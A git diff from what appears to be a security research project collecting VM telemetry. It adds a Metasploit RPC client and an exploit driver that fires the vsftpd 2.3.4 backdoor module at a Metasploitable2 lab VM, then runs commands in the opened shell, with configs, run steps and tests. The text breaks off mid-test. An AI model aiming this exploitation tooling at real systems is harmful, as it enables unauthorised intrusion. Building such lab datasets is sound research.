diff --git a/README.md b/README.md index def8588..b5fd503 100644 --- a/README.md +++ b/README.md @@ -73,9 +73,16 @@ above produces from real KVM behaviour. |---|---|---| | 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done | | 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done | -| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 | +| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🟡 driver landed, integration pending | | 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 | +The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny +msgpack-over-HTTPS msfrpc client plus an `MSFExploitDriver` plugged +into the orchestrator as the `on_phase` callback. First canned module: +`exploits/modules/vsftpd_234_backdoor.toml` (Metasploitable2's +CVE-2011-2523). End-to-end integration needs `msfrpcd` running and a +Metasploitable2 image at `vm/images/`, which is the next bring-up step. + For an interactive view of any episode (zoom/pan/hover), run: ```sh @@ -93,8 +100,8 @@ tools/show_envelope.sh data/episodes/ - ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end - ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid - ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition +- 🟡 **Tier 3 — exploit driver:** `MSFExploitDriver` + msfrpc client + first module config landed (`exploits/`); end-to-end run against a live `msfrpcd` + Metasploitable2 image still pending. - 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5) -- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open` - 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified) > **Topology note:** in this project the **Pi5 is the WireGuard-side @@ -182,7 +189,7 @@ late-boot disk write. That's a real KVM guest you're seeing. | `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent | | `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) | | `tools/` | Demo runners, load mimic, plot scripts | -| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) | +| [`exploits/`](exploits/README.md) | MSF RPC client + driver + per-module TOML configs (Tier 3) | | `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** | | `training/` | Model training code (deferred — schema first) | | `etc/` | systemd units and config templates installed by the deploy scripts | diff --git a/docs/sources.md b/docs/sources.md index e6b6303..2f8e30d 100644 --- a/docs/sources.md +++ b/docs/sources.md @@ -171,6 +171,10 @@ thing plays in our pipeline. - **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to produce the NoCloud cidata ISO without depending on system mkisofs/ xorriso. https://clalancette.github.io/pycdlib/ +- **msgpack** — binary serialization used by Metasploit's RPC API. The + Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't + pull in a higher-level Metasploit Python client. + https://msgpack.org --- diff --git a/exploits/README.md b/exploits/README.md index 0d433e8..6a37acb 100644 --- a/exploits/README.md +++ b/exploits/README.md @@ -1,12 +1,92 @@ # exploits/ -Metasploit resource scripts (`*.rc`) that drive specific exploit modules -deterministically — same inputs, same module options, every time. +The Tier-3 exploit driver — fires a Metasploit module against a +vulnerable target VM, watches for the resulting session, and stamps the +session-open transition into the episode's `events.jsonl` so the +labeler can mark `armed → infecting` honestly. -Each script: -- Sets `RHOSTS` to the guest's bridge IP. -- Sets a payload that opens a session usable for sample upload + execute. -- Avoids any options that introduce randomness in the exploit fire timing - (so that the `armed → infecting` transition lands at a predictable offset). +## Layout -These scripts pair with public Metasploit modules. We do not author exploits. +``` +exploits/ + msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd + driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase + modules.py ModuleConfig + TOML loader + modules/ + vsftpd_234_backdoor.toml first canned module (Metasploitable2) + ... +``` + +## Module configs + +Each `modules/*.toml` describes one Metasploit module — its path, the +options to set, and the payload to use. The driver reads these files +to drive `module.execute` over msfrpc. + +```toml +description = "..." +[module] +type = "exploit" # exploit | auxiliary | post +path = "unix/ftp/vsftpd_234_backdoor" + +[module.options] +RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime +RPORT = 21 + +[payload] +path = "cmd/unix/interact" +[payload.options] # optional +# LHOST = "{{ target_ip }}" + +[session] +type = "shell" +``` + +The only placeholder supported today is `{{ target_ip }}`. Add more in +`exploits/modules.py::ModuleConfig.render_options` when needed. + +## Running + +```sh +# 1. Start msfrpcd locally: +msfrpcd -P -U msf -a 127.0.0.1 -p 55553 + +# 2. Drop a vulnerable target image at vm/images/.qcow2 (e.g. +# Metasploitable2 — see docs/sources.md for sha256). + +# 3. Drive an episode: +MSFRPC_PASSWORD= uv run python tools/run_tier3_demo.py \ + --module vsftpd_234_backdoor \ + --target-port 21 \ + --data-root data +``` + +The episode's `events.jsonl` will contain: + +``` +driver_setup — module + target snapshotted before fire +exploit_fire — module.execute issued +session_open — new session id observed in session.list +session_landing_probe — first command response (id) recorded +sample_executed — workload kicked off inside the session +session_dormant — workload killed +session_killed — session.stop at episode end +``` + +These pair with the standard phase labels in `labels.jsonl` so a +downstream loader can reconcile "what the orchestrator scheduled" +against "what actually happened on the wire". + +## Adding a module + +1. Drop a TOML at `exploits/modules/.toml` per the schema above. +2. Pick a payload that works without a callback channel until the + `br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP + + `restrict=on` blocks reverse-tcp by design). `cmd/unix/interact` + and other "session on the same socket" payloads are safe. +3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module `. +4. The new module is automatically picked up by `tools/run_tier3_demo.py` + via `--module `; no driver code changes needed. + +We do **not** author exploits or modify upstream Metasploit code. The +driver is a pure adapter from the project's phase machine to msfrpc. diff --git a/exploits/__init__.py b/exploits/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/exploits/driver.py b/exploits/driver.py new file mode 100644 index 0000000..846057a --- /dev/null +++ b/exploits/driver.py @@ -0,0 +1,205 @@ +"""Tier-3 exploit driver. + +Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates +the closed phase enum into msfrpc actions: + + clean — idle. (no-op; exploit hasn't fired yet) + armed — module loaded + options applied; module fires + with ``module.execute``. Driver records the fire + timestamp via ``emit_event`` so the labeler can + align ``armed`` with what's actually happening. + infecting — poll for a new session; on session_open, run a + one-shot landing command (``id`` or similar) so + we have a clear "session is responsive" event. + infected_running — start observable workload inside the session. + dormant — kill the workload, leave the session alive. + reverting — kill session, snapshot revert handled by caller. + +The events the driver writes match the schema in ``docs/data-model.md``: +``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``, +``session_killed``. + +The driver does NOT author exploits or pick payloads at runtime — those +choices live in ``exploits/modules/*.toml``. The driver is a pure +adapter between the phase machine and msfrpc. +""" + +from __future__ import annotations + +import logging +import time +from dataclasses import dataclass +from typing import Callable + +from .modules import ModuleConfig +from .msfrpc import MSFRpcClient, wait_for_new_session + + +log = logging.getLogger("cis490.exploits.driver") + +EmitEvent = Callable[..., None] + + +@dataclass +class DriverConfig: + target_ip: str + session_open_timeout_s: float = 30.0 + # Workload command used to mimic XMRig-class infected_running shape + # in a real session. Kept simple on purpose — anything observable + # from outside the guest works for the dataset; we'll drop in a + # real sample at Tier 4. + workload_cmd: str = "yes > /dev/null" + # How we kill the workload at dormant time. + workload_kill_cmd: str = "pkill yes; true" + + +class MSFExploitDriver: + """Phase-to-msfrpc adapter. One instance per episode.""" + + def __init__( + self, + client: MSFRpcClient, + module: ModuleConfig, + cfg: DriverConfig, + emit_event: EmitEvent, + ) -> None: + self.client = client + self.module = module + self.cfg = cfg + self.emit = emit_event + + self._sessions_seen_at_arm: set[int] = set() + self._session_id: int | None = None + self._job_id: int | str | None = None + self._fired = False + + # ---- lifecycle ------------------------------------------------------ + + def setup(self) -> None: + """Authenticate and snapshot the pre-existing session set so we + can recognize a *new* session as the one we just opened.""" + self.client.login() + self._sessions_seen_at_arm = set(self.client.session_list().keys()) + self.emit( + "driver_setup", + module=self.module.module_path, + payload=self.module.payload_path, + target_ip=self.cfg.target_ip, + preexisting_sessions=sorted(self._sessions_seen_at_arm), + ) + + def teardown(self) -> None: + if self._session_id is not None: + try: + self.client.session_stop(self._session_id) + self.emit("session_killed", session_id=self._session_id) + except Exception: + log.exception("session.stop on %s", self._session_id) + if self._job_id is not None: + try: + self.client.job_stop(self._job_id) + except Exception: + log.debug("job.stop on %s (often already gone)", self._job_id) + self.client.logout() + + # ---- phase callback ------------------------------------------------- + + def set_phase(self, phase: str) -> None: + log.info("driver phase -> %s", phase) + if phase == "clean": + return + if phase == "armed": + self._fire() + elif phase == "infecting": + self._await_session() + elif phase == "infected_running": + self._start_workload() + elif phase == "dormant": + self._stop_workload() + elif phase == "reverting": + self.teardown() + else: + log.warning("unknown phase: %s", phase) + + # ---- actions -------------------------------------------------------- + + def _fire(self) -> None: + if self._fired: + log.debug("module already fired; skipping re-fire") + return + opts = self.module.render_options(target_ip=self.cfg.target_ip) + self.emit( + "exploit_fire", + module=self.module.module_path, + options={k: v for k, v in opts.items() if k != "PASSWORD"}, + ) + resp = self.client.module_execute( + self.module.module_type, self.module.module_path, opts, + ) + self._job_id = resp.get("job_id") + self._fired = True + + def _await_session(self) -> None: + if self._session_id is not None: + return + result = wait_for_new_session( + self.client, + seen=self._sessions_seen_at_arm, + timeout_s=self.cfg.session_open_timeout_s, + ) + if result is None: + self.emit( + "session_open_timeout", + module=self.module.module_path, + timeout_s=self.cfg.session_open_timeout_s, + ) + log.warning( + "no session opened within %.1fs", self.cfg.session_open_timeout_s, + ) + return + sid, info = result + self._session_id = sid + self.emit( + "session_open", + session_id=sid, + session_type=info.get("type"), + tunnel_peer=info.get("tunnel_peer"), + ) + # Landing probe so we have a known-good RTT marker on the wire. + try: + self.client.session_shell_write(sid, "id") + time.sleep(0.5) + out = self.client.session_shell_read(sid) + self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256]) + except Exception: + log.exception("landing probe on session %s", sid) + + def _start_workload(self) -> None: + if self._session_id is None: + log.warning("infected_running with no session — skipping workload") + return + self.client.session_shell_write( + self._session_id, + f"nohup sh -c {_shquote(self.cfg.workload_cmd)} /dev/null 2>&1 & disown", + ) + self.emit( + "sample_executed", + session_id=self._session_id, + command=self.cfg.workload_cmd, + ) + + def _stop_workload(self) -> None: + if self._session_id is None: + return + self.client.session_shell_write( + self._session_id, self.cfg.workload_kill_cmd, + ) + self.emit("session_dormant", session_id=self._session_id) + + +def _shquote(s: str) -> str: + # Minimal POSIX single-quote escaping. The workload command is set + # by us, not by anything user-controlled, so we just need to handle + # embedded single quotes correctly for completeness. + return "'" + s.replace("'", "'\\''") + "'" diff --git a/exploits/modules.py b/exploits/modules.py new file mode 100644 index 0000000..c3db923 --- /dev/null +++ b/exploits/modules.py @@ -0,0 +1,97 @@ +"""TOML loader for exploit-module configs. + +Each ``exploits/modules/*.toml`` describes one Metasploit module — its +path, the options to set, the payload to use, and how the driver +should treat the resulting session. The driver consumes ``ModuleConfig`` +objects; the TOML files are the on-disk source of truth. + +Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are +imperative and assume an interactive console; the driver needs the +*structured* options to push them through msfrpc. TOML is the simplest +way to express a small typed map of options — and it round-trips +cleanly into ``meta.json`` for episode reproducibility. +""" + +from __future__ import annotations + +import tomllib +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any + + +_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"} + + +@dataclass(frozen=True) +class ModuleConfig: + name: str # short id, e.g. "vsftpd_234_backdoor" + module_type: str # "exploit" | "auxiliary" | "post" + module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor" + options: dict[str, Any] = field(default_factory=dict) + payload_path: str | None = None # e.g. "cmd/unix/interact" + payload_options: dict[str, Any] = field(default_factory=dict) + expected_session_type: str = "shell" # what we'll get on success + description: str = "" + + def render_options(self, *, target_ip: str) -> dict[str, Any]: + """Substitute ``{{ target_ip }}`` placeholders in options. + + Module configs use Jinja-style placeholders for any value that + isn't known until episode time (RHOSTS, LHOST, etc.). Today the + only supported placeholder is ``target_ip``; if more are needed + later, generalize here.""" + out: dict[str, Any] = {} + for k, v in self.options.items(): + if isinstance(v, str) and "{{" in v: + out[k] = ( + v.replace("{{ target_ip }}", target_ip) + .replace("{{target_ip}}", target_ip) + ) + else: + out[k] = v + # MSF requires PAYLOAD as a top-level option even though we + # carry it in a separate field on the config. + if self.payload_path: + out["PAYLOAD"] = self.payload_path + for k, v in self.payload_options.items(): + if isinstance(v, str) and "{{" in v: + v = ( + v.replace("{{ target_ip }}", target_ip) + .replace("{{target_ip}}", target_ip) + ) + out[k] = v + return out + + +def load_module_config(path: Path) -> ModuleConfig: + raw = tomllib.loads(path.read_text()) + mod = raw.get("module") or {} + module_path = mod.get("path") + module_type = mod.get("type", "exploit") + if not isinstance(module_path, str) or not module_path: + raise ValueError(f"{path}: module.path must be a non-empty string") + if module_type not in _VALID_MODULE_TYPES: + raise ValueError( + f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}" + ) + options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {}) + payload = raw.get("payload") or {} + return ModuleConfig( + name=path.stem, + module_type=module_type, + module_path=module_path, + options=dict(options), + payload_path=payload.get("path"), + payload_options=dict(payload.get("options") or {}), + expected_session_type=raw.get("session", {}).get("type", "shell"), + description=raw.get("description", ""), + ) + + +def load_module_configs(directory: Path) -> dict[str, ModuleConfig]: + """Load every ``*.toml`` under ``directory``, keyed by short name.""" + return { + p.stem: load_module_config(p) + for p in sorted(directory.glob("*.toml")) + } diff --git a/exploits/modules/vsftpd_234_backdoor.toml b/exploits/modules/vsftpd_234_backdoor.toml new file mode 100644 index 0000000..4e7374f --- /dev/null +++ b/exploits/modules/vsftpd_234_backdoor.toml @@ -0,0 +1,23 @@ +description = """ +vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP +USER name ending with ':)'. Standard Metasploitable2 exploit, fully +deterministic — perfect for a Tier-3 first-light run because the +exploit fire timing is bounded by a single FTP round-trip. +""" + +[module] +type = "exploit" +path = "unix/ftp/vsftpd_234_backdoor" + +[module.options] +RHOSTS = "{{ target_ip }}" +RPORT = 21 +# The exploit returns its own command shell — we drive it with a +# minimal cmd/unix/interact payload so the session lands as a plain +# shell session usable by session.shell_write/read. + +[payload] +path = "cmd/unix/interact" + +[session] +type = "shell" diff --git a/exploits/msfrpc.py b/exploits/msfrpc.py new file mode 100644 index 0000000..f39ca49 --- /dev/null +++ b/exploits/msfrpc.py @@ -0,0 +1,231 @@ +"""Tiny Metasploit RPC client — just enough for the Tier-3 driver. + +We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is +huge; this client implements only the verbs we actually call: + + auth.login — get a token + auth.logout — release the token + module.execute — fire an exploit (or aux) module by name + job.list / job.stop — manage the running module + session.list — see opened sessions, find the one we just opened + session.shell_write/read — run commands in a shell session + session.stop — kill a session at episode end + +Why not pull in pymetasploit3? Two reasons: + - msfrpcd's protocol is small enough that owning it removes a third-party + dep (and a maintenance risk on a course project). + - the parts we need (session opening, shell commands, job lifecycle) + are simple, and we want full visibility into what's on the wire when + debugging an exploit fire. + +The client is intentionally synchronous; the Tier-3 driver runs in the +orchestrator's main thread alongside the collector, and a session-open +poll of a few hundred milliseconds is well within budget. +""" + +from __future__ import annotations + +import http.client +import logging +import socket +import ssl +import time +from dataclasses import dataclass +from typing import Any + +try: + import msgpack # type: ignore[import-untyped] +except ImportError as e: # pragma: no cover - import-time guard + raise ImportError( + "the msgpack package is required for the MSF RPC client. " + "install it with: pip install msgpack" + ) from e + + +log = logging.getLogger("cis490.msfrpc") + + +class MSFRpcError(RuntimeError): + """Raised when msfrpcd returns an error or a malformed response.""" + + +@dataclass +class MSFRpcConfig: + host: str = "127.0.0.1" + port: int = 55553 + user: str = "msf" + password: str = "" + ssl: bool = True + timeout_s: float = 30.0 + # msfrpcd's default cert is self-signed — most callers will run + # against localhost where this is the right tradeoff. Override + # explicitly for any non-loopback host. + verify: bool = False + + +class MSFRpcClient: + """Synchronous msfrpcd client. Token is acquired on ``login()`` and + re-used on every subsequent call. Not thread-safe; the driver owns + one client per episode.""" + + def __init__(self, cfg: MSFRpcConfig) -> None: + self.cfg = cfg + self._token: str | None = None + + # ---- session management -------------------------------------------- + + def login(self) -> None: + resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password) + if resp.get("result") != "success" or "token" not in resp: + raise MSFRpcError(f"auth.login failed: {resp!r}") + self._token = resp["token"] + log.info("msfrpc auth.login ok (token=%s...)", self._token[:8]) + + def logout(self) -> None: + if self._token is None: + return + try: + self._call("auth.logout", self._token) + except MSFRpcError as e: + log.warning("msfrpc auth.logout: %s", e) + finally: + self._token = None + + # ---- modules -------------------------------------------------------- + + def module_execute( + self, + module_type: str, + module_name: str, + options: dict[str, Any], + ) -> dict[str, Any]: + """Fire a module. Returns ``{"job_id": int, "uuid": str}``.""" + resp = self._call("module.execute", module_type, module_name, options) + if "job_id" not in resp: + raise MSFRpcError(f"module.execute returned no job_id: {resp!r}") + log.info( + "module.execute %s/%s -> job_id=%s uuid=%s", + module_type, module_name, resp["job_id"], resp.get("uuid"), + ) + return resp + + # ---- jobs ----------------------------------------------------------- + + def job_list(self) -> dict[str, str]: + return self._call("job.list") + + def job_stop(self, job_id: int | str) -> dict[str, Any]: + # msfrpcd accepts the id as a string. + return self._call("job.stop", str(job_id)) + + # ---- sessions ------------------------------------------------------- + + def session_list(self) -> dict[int, dict[str, Any]]: + raw = self._call("session.list") + # msfrpcd keys session ids as ints in msgpack but some versions + # round-trip them as strings. Normalize. + out: dict[int, dict[str, Any]] = {} + for k, v in (raw or {}).items(): + try: + out[int(k)] = v + except (TypeError, ValueError): + pass + return out + + def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]: + if not data.endswith("\n"): + data = data + "\n" + return self._call("session.shell_write", session_id, data) + + def session_shell_read(self, session_id: int) -> str: + resp = self._call("session.shell_read", session_id) + return resp.get("data", "") if isinstance(resp, dict) else "" + + def session_stop(self, session_id: int) -> dict[str, Any]: + return self._call("session.stop", session_id) + + # ---- transport ------------------------------------------------------ + + def _call(self, method: str, *args: Any) -> dict[str, Any]: + if self._token is None: + raise MSFRpcError("not authenticated; call login() first") + return self._raw_call([method, self._token, *args]) + + def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]: + return self._raw_call([method, *args]) + + def _raw_call(self, payload: list[Any]) -> dict[str, Any]: + body = msgpack.packb(payload, use_bin_type=False) + conn = self._open_conn() + try: + conn.request( + "POST", + "/api/", + body=body, + headers={ + "Content-Type": "binary/message-pack", + "Content-Length": str(len(body)), + "Connection": "close", + }, + ) + r = conn.getresponse() + raw = r.read() + if r.status != 200: + raise MSFRpcError( + f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}" + ) + except (socket.error, http.client.HTTPException) as e: + raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e + finally: + conn.close() + + try: + decoded = msgpack.unpackb(raw, raw=False) + except Exception as e: + raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e + + if isinstance(decoded, dict) and decoded.get("error") is True: + raise MSFRpcError( + f"{payload[0]!r}: {decoded.get('error_class')} " + f"{decoded.get('error_message')}" + ) + if not isinstance(decoded, dict): + # session.list and friends can legitimately return {} or a dict, + # but never a non-dict — anything else is a protocol violation. + raise MSFRpcError( + f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}" + ) + return decoded + + def _open_conn(self) -> http.client.HTTPConnection: + if self.cfg.ssl: + ctx = ssl.create_default_context() + if not self.cfg.verify: + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + return http.client.HTTPSConnection( + self.cfg.host, self.cfg.port, + timeout=self.cfg.timeout_s, context=ctx, + ) + return http.client.HTTPConnection( + self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s, + ) + + +def wait_for_new_session( + client: MSFRpcClient, + *, + seen: set[int], + timeout_s: float, + poll_s: float = 0.25, +) -> tuple[int, dict[str, Any]] | None: + """Poll ``session.list`` until a session id we haven't seen before + appears, or until timeout. Returns ``(session_id, info)`` or None.""" + deadline = time.monotonic() + timeout_s + while time.monotonic() < deadline: + sessions = client.session_list() + for sid, info in sessions.items(): + if sid not in seen: + return sid, info + time.sleep(poll_s) + return None diff --git a/orchestrator/episode.py b/orchestrator/episode.py index 3735f91..72bc867 100644 --- a/orchestrator/episode.py +++ b/orchestrator/episode.py @@ -83,20 +83,24 @@ class EpisodeRunner: self.on_phase = on_phase self.episode_id = cfg.episode_id or new_ulid() self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id + # Create the dir up front so external drivers can call + # emit_event() between construction and run() — e.g. an exploit + # driver that writes a driver_setup event before the schedule + # walks. The dir is otherwise empty until run() opens files. + self.episode_dir.mkdir(parents=True, exist_ok=True) self._t_mono_origin_ns: int = 0 self._stop = threading.Event() # ---- public --------------------------------------------------------- def run(self) -> EpisodeResult: - self.episode_dir.mkdir(parents=True, exist_ok=True) self._t_mono_origin_ns = time.monotonic_ns() started_at_wall = datetime.now(timezone.utc).isoformat() meta = self._initial_meta(started_at_wall) self._write_meta(meta) - self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name) + self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name) rows_holder: dict[str, int] = {"rows": 0} @@ -124,13 +128,9 @@ class EpisodeRunner: self._stop.set() t.join(timeout=2.0) - end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns pid_alive = _pid_alive(self.cfg.target_pid) - self._emit_event( - end_mono_ns, - "episode_end", - target_pid_alive=pid_alive, - ) + self.emit_event("episode_end", target_pid_alive=pid_alive) + end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat() meta["result"] = { @@ -171,9 +171,7 @@ class EpisodeRunner: break t_mono = time.monotonic_ns() - self._t_mono_origin_ns self._emit_label(t_mono, phase, prev=prev, reason="scheduled") - self._emit_event( - t_mono, "phase_transition", to=phase, prev=prev - ) + self.emit_event("phase_transition", to=phase, prev=prev) if self.on_phase is not None: try: self.on_phase(phase) @@ -220,7 +218,15 @@ class EpisodeRunner: f.write("\n") os.replace(tmp, path) - def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None: + def emit_event(self, event: str, **extra) -> None: + """Append a row to events.jsonl. Public so external drivers + (e.g. the MSF exploit driver) can stamp their own events with + the same monotonic clock the orchestrator is using.""" + t_mono_ns = ( + time.monotonic_ns() - self._t_mono_origin_ns + if self._t_mono_origin_ns + else 0 + ) row = { "t_mono_ns": t_mono_ns, "t_wall_ns": time.time_ns(), diff --git a/pyproject.toml b/pyproject.toml index ded5c12..9c1d0d9 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -6,6 +6,7 @@ requires-python = ">=3.11" dependencies = [ "starlette>=0.36", "uvicorn[standard]>=0.27", + "msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver ] [dependency-groups] diff --git a/tests/test_exploits.py b/tests/test_exploits.py new file mode 100644 index 0000000..17422cd --- /dev/null +++ b/tests/test_exploits.py @@ -0,0 +1,318 @@ +"""Tests for the Tier-3 exploit driver and its module loader. + +The msfrpc transport itself is exercised against a fake client so the +suite runs in-process. A live-msfrpcd integration test is out of +scope here — the wire format is small and the high-value coverage is +the phase-to-action mapping plus the events the driver emits. +""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +import pytest + +from exploits.driver import DriverConfig, MSFExploitDriver +from exploits.modules import ModuleConfig, load_module_config + + +REPO_ROOT = Path(__file__).resolve().parent.parent +MODULES_DIR = REPO_ROOT / "exploits" / "modules" + + +# ----------------------------------------------------------------------- +# Module config loader +# ----------------------------------------------------------------------- + +def test_load_vsftpd_module_config_round_trip() -> None: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + assert cfg.name == "vsftpd_234_backdoor" + assert cfg.module_type == "exploit" + assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor" + assert cfg.options["RPORT"] == 21 + assert cfg.options["RHOSTS"] == "{{ target_ip }}" + assert cfg.payload_path == "cmd/unix/interact" + + +def test_render_options_substitutes_target_ip() -> None: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + rendered = cfg.render_options(target_ip="10.200.0.10") + assert rendered["RHOSTS"] == "10.200.0.10" + assert rendered["RPORT"] == 21 + assert rendered["PAYLOAD"] == "cmd/unix/interact" + + +def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None: + p = tmp_path / "x.toml" + p.write_text( + '[module]\n' + 'type = "exploit"\n' + 'path = "unix/ftp/example"\n' + '[module.options]\n' + 'RHOSTS = "{{target_ip}}"\n' + 'LHOST = "{{ target_ip }}"\n' + ) + cfg = load_module_config(p) + rendered = cfg.render_options(target_ip="10.0.0.5") + assert rendered["RHOSTS"] == "10.0.0.5" + assert rendered["LHOST"] == "10.0.0.5" + + +def test_load_rejects_missing_module_path(tmp_path: Path) -> None: + p = tmp_path / "bad.toml" + p.write_text('[module]\ntype = "exploit"\n') + with pytest.raises(ValueError, match="module.path"): + load_module_config(p) + + +def test_load_rejects_unknown_module_type(tmp_path: Path) -> None: + p = tmp_path / "bad.toml" + p.write_text( + '[module]\ntype = "evil"\npath = "unix/ftp/x"\n' + ) + with pytest.raises(ValueError, match="module.type"): + load_module_config(p) + + +# ----------------------------------------------------------------------- +# Exploit driver — phase transitions against a fake MSFRpcClient +# ----------------------------------------------------------------------- + +class FakeMSFRpcClient: + """Stand-in that records every method called and lets a test + script the apparent state of msfrpcd (sessions, return values).""" + + def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None: + self.calls: list[tuple[str, tuple, dict]] = [] + self.logged_in = False + self._fired = False + self._sessions: dict[int, dict[str, Any]] = {} + self._sessions_after_fire = sessions_after_fire or {} + self.shell_writes: list[tuple[int, str]] = [] + + def _record(self, name: str, *args, **kwargs) -> None: + self.calls.append((name, args, kwargs)) + + def login(self) -> None: + self._record("login") + self.logged_in = True + + def logout(self) -> None: + self._record("logout") + self.logged_in = False + + def session_list(self) -> dict[int, dict[str, Any]]: + self._record("session_list") + return dict(self._sessions) + + def module_execute(self, mtype: str, mname: str, opts: dict) -> dict: + self._record("module_execute", mtype, mname, opts) + self._fired = True + # Simulate sessions appearing after the exploit fires. + self._sessions = dict(self._sessions_after_fire) + return {"job_id": 7, "uuid": "fake-uuid"} + + def job_stop(self, job_id) -> dict: + self._record("job_stop", job_id) + return {"result": "success"} + + def session_shell_write(self, sid: int, data: str) -> dict: + self._record("session_shell_write", sid, data) + if not data.endswith("\n"): + data = data + "\n" + self.shell_writes.append((sid, data)) + return {"write_count": str(len(data))} + + def session_shell_read(self, sid: int) -> str: + self._record("session_shell_read", sid) + return "uid=0(root) gid=0(root)\n" + + def session_stop(self, sid: int) -> dict: + self._record("session_stop", sid) + self._sessions.pop(sid, None) + return {"result": "success"} + + +def _make_driver( + sessions_after_fire: dict[int, dict[str, Any]] | None = None, + target_ip: str = "10.200.0.10", +) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire) + events: list[tuple[str, dict]] = [] + + def emit(event: str, **extra: Any) -> None: + events.append((event, extra)) + + driver = MSFExploitDriver( + client=client, # type: ignore[arg-type] + module=cfg, + cfg=DriverConfig( + target_ip=target_ip, + session_open_timeout_s=0.5, # tests must not block + ), + emit_event=emit, + ) + return driver, client, events + + +def test_driver_setup_authenticates_and_snapshots_sessions() -> None: + driver, client, events = _make_driver() + client._sessions = {99: {"type": "shell"}} # pre-existing session + driver.setup() + assert client.logged_in is True + assert driver._sessions_seen_at_arm == {99} + assert events[0][0] == "driver_setup" + assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor" + assert events[0][1]["target_ip"] == "10.200.0.10" + + +def test_full_phase_walk_emits_expected_event_order() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}}, + ) + driver.setup() + for phase in [ + "clean", "armed", "infecting", + "infected_running", "dormant", + "infected_running", "dormant", + "clean", + ]: + driver.set_phase(phase) + driver.teardown() + + names = [e[0] for e in events] + # Order matters: fire comes before session_open, which comes before + # workload, which comes before kill+logout. + assert names.index("exploit_fire") < names.index("session_open") + assert names.index("session_open") < names.index("session_landing_probe") + assert names.index("session_landing_probe") < names.index("sample_executed") + assert names.count("sample_executed") == 2 # two infected_running phases + assert names.count("session_dormant") == 2 + assert "session_killed" in names + + # Driver should have asked the FakeClient to fire exactly once. + fire_calls = [c for c in client.calls if c[0] == "module_execute"] + assert len(fire_calls) == 1 + _, args, _ = fire_calls[0] + assert args[1] == "unix/ftp/vsftpd_234_backdoor" + assert args[2]["RHOSTS"] == "10.200.0.10" + assert args[2]["PAYLOAD"] == "cmd/unix/interact" + + +def test_session_open_timeout_emits_timeout_event() -> None: + # No sessions ever appear after fire. + driver, client, events = _make_driver(sessions_after_fire={}) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") + names = [e[0] for e in events] + assert "session_open_timeout" in names + assert "session_open" not in names + + +def test_workload_phases_are_no_op_without_session() -> None: + driver, client, events = _make_driver(sessions_after_fire={}) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") # times out, no session + driver.set_phase("infected_running") + driver.set_phase("dormant") + # No shell writes should have happened. + assert client.shell_writes == [] + + +def 